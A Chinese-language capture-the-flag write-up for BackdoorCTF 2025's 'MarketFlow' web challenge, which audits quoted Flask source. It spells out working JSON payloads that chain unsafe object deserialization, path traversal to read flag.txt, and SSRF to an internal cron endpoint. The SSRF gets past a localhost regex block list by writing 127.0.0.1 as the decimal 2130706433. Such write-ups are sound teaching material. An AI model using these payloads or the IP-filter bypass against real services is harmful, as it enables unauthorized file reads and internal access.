BackdoorCTF 2025 - MarketFlow
做完这道题感觉浑身舒畅
MarketFlow
解题过程
首先查看app.py:
1
2
3
4
5
6
7
8
9
10
11
12
from flask import Flask, request, jsonify, session, send_file, render_template
...
@app.route('/api/campaigns', methods=['POST'])
@login_required
def create_campaign():
data = request.json
user_id = session['user_id']
campaign_obj = object_manager.deserialize(data)
...
发现这里存在一个deserialize(data),我们应当对反序列化这种词汇高度敏感,于是看看上下文,发现这个data来自于data = request.json,也就是说data是JSON类型。然后去看看object_manager.deserialize()的实现:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
class ObjectManager:
def __init__(self):
self.registry = CLASS_REGISTRY
def deserialize(self, data):
if not isinstance(data, dict):
return data
obj_type = data.get('_type')
if not obj_type:
return data
if obj_type not in self.registry:
raise ValueError(f"Unknown type: {obj_type}")
klass = self.registry[obj_type]
if not hasattr(klass, 'schema_version'):
raise ValueError(f"Invalid class: {obj_type}")
if not getattr(klass, 'serializable', False):
raise ValueError(f"Type not serializable: {obj_type}")
constructor_data = {k: v for k, v in data.items() if k != '_type'}
instance = klass(**constructor_data)
for key, value in data.items():
if isinstance(value, dict) and '_type' in value:
nested = self.deserialize(value)
setattr(instance, key, nested)
return instance
def serialize(self, obj):
if hasattr(obj, 'to_dict'):
return obj.to_dict()
return str(obj)
检查这个代码逻辑,首先,如果不是字典类型,就直接返回原数据。接着,要看字典是否含有键值对_type,这个_type必须要在CLASS_REGISTRY中,然后这个函数获取了_type的类型,检查这个类型是否可序列化,之后清除_type这个键值对。关键的地方是instance = klass(**constructor_data),这个反序列化函数在这里创建了一个动态对象,其参数就是刚刚清除了_type的字典。之后就是递归反序列化,如果参数有字典,字典含有_type就继续反序列化。
接着向上看,找到:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
CLASS_REGISTRY = {
'User': User,
'UserPreferences': UserPreferences,
'Campaign': Campaign,
'CampaignSchedule': CampaignSchedule,
'TargetAudience': TargetAudience,
'Analytics': Analytics,
'ReportConfiguration': ReportConfiguration,
'MetricAggregator': MetricAggregator,
'AnalyticsProcessor': AnalyticsProcessor,
'Content': Content,
'ContentMetadata': ContentMetadata,
'TemplateSpecification': TemplateSpecification,
'WebhookForwarder': WebhookForwarder,
'CacheConfiguration': CacheConfiguration,
'PersistenceAdapter': PersistenceAdapter
}
这就是所有支持反序列化函数的类型(但不一定能被反序列化,最重要的是其参数)。
按照这个思路,我们肯定希望利用反序列化的特性,看看有没有可利用的类。这里面很多类都是常规的数据类,没有特殊的操作,有几个类值得关注:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
class ReportConfiguration:
schema_version = "1.0"
serializable = True
def __init__(self, report_type, date_range, metrics=None, dimensions=None, processor=None, **kwargs):
self.report_type = report_type
self.date_range = date_range
self.metrics = metrics or []
self.dimensions = dimensions or []
self.processor = processor
self.output_format = kwargs.get('output_format', 'json')
self.template = kwargs.get('template')
if isinstance(self.processor, dict) and '_type' in self.processor:
from services.object_manager import ObjectManager
manager = ObjectManager()
self.processor = manager.deserialize(self.processor)
def to_dict(self):
return {
'report_type': self.report_type,
'date_range': self.date_range,
'metrics': self.metrics,
'dimensions': self.dimensions
}
class AnalyticsProcessor:
schema_version = "1.0"
serializable = True
def __init__(self, data_source, aggregation_rules=None, output_config=None, **kwargs):
self.data_source = data_source
self.aggregation_rules = aggregation_rules or []
self.output_config = output_config
self.options = kwargs
if isinstance(self.output_config, dict) and '_type' in self.output_config:
from services.object_manager import ObjectManager
manager = ObjectManager()
self.output_config = manager.deserialize(self.output_config)
def to_dict(self):
return {
'data_source': self.data_source,
'aggregation_rules': self.aggregation_rules
}
ReportConfiguration和AnalyticsProcessor在自己初始化的时候可以反序列化自己的self.processor。
反序列化暂时看不出什么名堂了,我们继续看app.py。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
@app.route('/api/analytics/reports', methods=['POST'])
@login_required
def generate_report():
data = request.json
user_id = session['user_id']
report_config = object_manager.deserialize(data)
report_id = secrets.token_hex(16)
report_token = secrets.token_urlsafe(32)
scheduler.schedule_task({
'task_type': 'generate_report',
'report_id': report_id,
'report_token': report_token,
'user_id': user_id,
'config': data
})
return jsonify({
"report_id": report_id,
"status": "scheduled",
"report_url": f"/reports/{report_token}.html"
})
这个函数很特殊,因为除了它没有任何函数中在反序列化以后调用scheduler,去看看源码了解下这个类在干什么:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
class Scheduler:
def __init__(self):
pass
def schedule_task(self, task_data):
db = get_db()
task_id = secrets.token_hex(16)
db.execute(
"INSERT INTO scheduled_tasks (id, task_type, task_data, status) VALUES (?, ?, ?, ?)",
[task_id, task_data.get('task_type'), json.dumps(task_data), 'pending']
)
db.commit()
return task_id
我们看到这个Scheduler可以把task_data存到数据库中,这意味这我们的payload如果用/api/analytics/reports传入,可以在数据库中持久化存在。接着往下看:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if task_type == 'generate_report':
config_data = task_data.get('config', {})
config_obj = manager.deserialize(config_data)
report_token = task_data.get('report_token', secrets.token_urlsafe(32))
if isinstance(config_obj, ReportConfiguration):
if hasattr(config_obj, 'processor') and config_obj.processor:
processor = config_obj.processor
if hasattr(processor, 'output_config') and processor.output_config:
output_cfg = processor.output_config
if isinstance(output_cfg, CacheConfiguration):
cache_service.prime(output_cfg)
if hasattr(config_obj, 'template') and config_obj.template:
template_spec = config_obj.template
if isinstance(template_spec, dict) and '_type' in template_spec:
template_spec = manager.deserialize(template_spec)
if hasattr(template_spec, 'template_name'):
output = renderer.render(template_spec)
发现config_obj也是被反序列化来的对象。又发现有render方法,这个方法可以用来读文件,也就是说可以用它去看flag,看看源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def render(self, template_spec):
if not hasattr(template_spec, 'template_name'):
raise ValueError("Template specification missing template_name")
template_path = os.path.join(self.template_dir, template_spec.template_name)
if template_path.endswith('.tpl'):
return self._render_legacy_template(template_path, template_spec)
else:
return self._render_safe_template(template_path, template_spec)
def _render_safe_template(self, template_path, spec):
with open(template_path, 'r') as f:
template_content = f.read()
variables = getattr(spec, 'variables', {})
for key, value in variables.items():
placeholder = f"}}}"
template_content = template_content.replace(placeholder, str(value))
return template_content
发现这里读数据用的是 os.path.join(self.template_dir, template_spec.template_name),众所周知,os.path.join()不安全,如果有绝对路径存在,就会忽略别的参数,我们在这如果构造路径穿越理论上就可以访问任何地方的文件。
那么接下来的思路就是如何构造payload来读取文件。很显然,config_data必须有属性template,那么就只有ReportConfiguration能满足这个操作了。所以可以借由/api/analytics/reports构造payload,首先可以写出data:
1
2
3
4
5
6
7
8
{
"_type": "ReportConfiguration",
"report_type": "114",
"date_range": "514",
"template": {
}
}
由于沟槽的python不会显式声明属性的类型,根据类型推断我们知道,config_obj.template的类型是TemplateRenderer,所以我们可以接着写:
1
2
3
4
5
6
7
8
9
10
{
"_type": "ReportConfiguration",
"report_type": "114",
"date_range": "514",
"template": {
"_type": "TemplateSpecification",
"template_name": "../../../../flag.txt",
"output_path": "stolen.txt"
}
}
那么这样一个payload就被构造好了。
但是光传上去没有什么用,必须要让payload执行,我们接着在ap.py中找有没有调用Scheduler的函数,发现:
1
2
3
4
5
6
7
8
9
10
11
@app.route('/internal/cron/process', methods=['POST'])
def process_scheduled_tasks():
if request.remote_addr not in ['127.0.0.1', 'localhost']:
return jsonify({"error": "Internal only"}), 403
try:
scheduler.process_pending()
except Exception as e:
return jsonify({"error": str(e)}), 403
return jsonify({"status": "processed"})
这里有scheduler.process_pending()就能让我们的payload真正加载。但是出现了一个问题,它不允许外部访问,也就是说我们需要找到SSRF让他跨站请求。恰好这个函数下面就是:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
@app.route('/api/webhooks/forward', methods=['POST'])
@login_required
def forward_webhook():
from services.webhook_service import WebhookForwarder
data = request.json
forwarder_obj = object_manager.deserialize(data)
if not isinstance(forwarder_obj, WebhookForwarder):
return jsonify({"error": "Invalid forwarder configuration"}), 400
payload = data.get('payload', {})
result = forwarder_obj.forward(payload)
return jsonify(result)
这里有反序列化,意味着我们也可以像上面一样构成payload,又发现了forward,这个词令人遐想连篇,赶紧看看WebhookForwarder:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
class WebhookForwarder:
schema_version = "1.0"
serializable = True
def __init__(self, target_url, method='POST', headers=None, **kwargs):
self.target_url = target_url
self.method = method.upper()
self.headers = headers or {}
self.options = kwargs
def forward(self, data):
if not is_safe_url(self.target_url):
raise ValueError("URL not allowed: localhost or private IP detected")
try:
if self.method == 'GET':
response = requests.get(
self.target_url,
headers=self.headers,
timeout=5
)
else:
response = requests.post(
self.target_url,
json=data,
headers=self.headers,
timeout=5
)
return {
'status_code': response.status_code,
'body': response.text[:1000]
}
except Exception as e:
return {
'error': str(e)
}
def to_dict(self):
return {
'target_url': self.target_url,
'method': self.method
}
这就非常妙了,通过反序列化漏洞构造一个WebhookForwarder对象,让其请求/internal/cron/process,这样就是本机IP了:
1
2
3
4
5
{
"_type": "WebhookForwarder",
"target_url": f"http://{LOCAL_IP_DECIMAL}:5000/internal/cron/process",
"method": "POST"
}
这里不知道LOCAL_IP_DECIMAL应该怎么写,因为:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
def is_safe_url(url):
parsed = urlparse(url)
host = parsed.hostname
if not host:
return False
localhost_patterns = [
r'^localhost$',
r'^127\.',
r'^0\.0\.0\.0$',
r'^::1$',
r'^::$',
r'^0:0:0:0:0:0:0:1$'
]
for pattern in localhost_patterns:
if re.match(pattern, host, re.IGNORECASE):
return False
private_ranges = [
r'^10\.',
r'^172\.(1[6-9]|2[0-9]|3[01])\.',
r'^192\.168\.',
r'^169\.254\.',
r'^fc00:',
r'^fe80:'
]
for pattern in private_ranges:
if re.match(pattern, host, re.IGNORECASE):
return False
return True
这个函数几乎禁用了所有本地IP地址,我们应该怎么构造呢?
这里采用LOCAL_IP_DECIMAL = "2130706433" # 127.0.0.1,也就是十进制的IP。 Python 的 requests 库,以及底层的 socket 库会自动将这个数字解析为 127.0.0.1。这样就实现了绕过。
所以我们直接POST这个
1
2
3
4
5
{
"_type": "WebhookForwarder",
"target_url": f"http://2130706433:5000/internal/cron/process",
"method": "POST"
}
然后访问/report/stolen.txt即可。
回顾与反思
这个题堪称OWASP TOP10的集小成之作,有SSRF、反序列化,还有一些waf绕过的小技巧,很考察代码审计能力和敏感度。
私以为真正的CTF题目也就应如此,不是刻意地以一些简单的场景+复杂的waf去搞做题式payload构造,而是在真实的场景中去发现各种漏洞。
感觉这个题真的很不错。
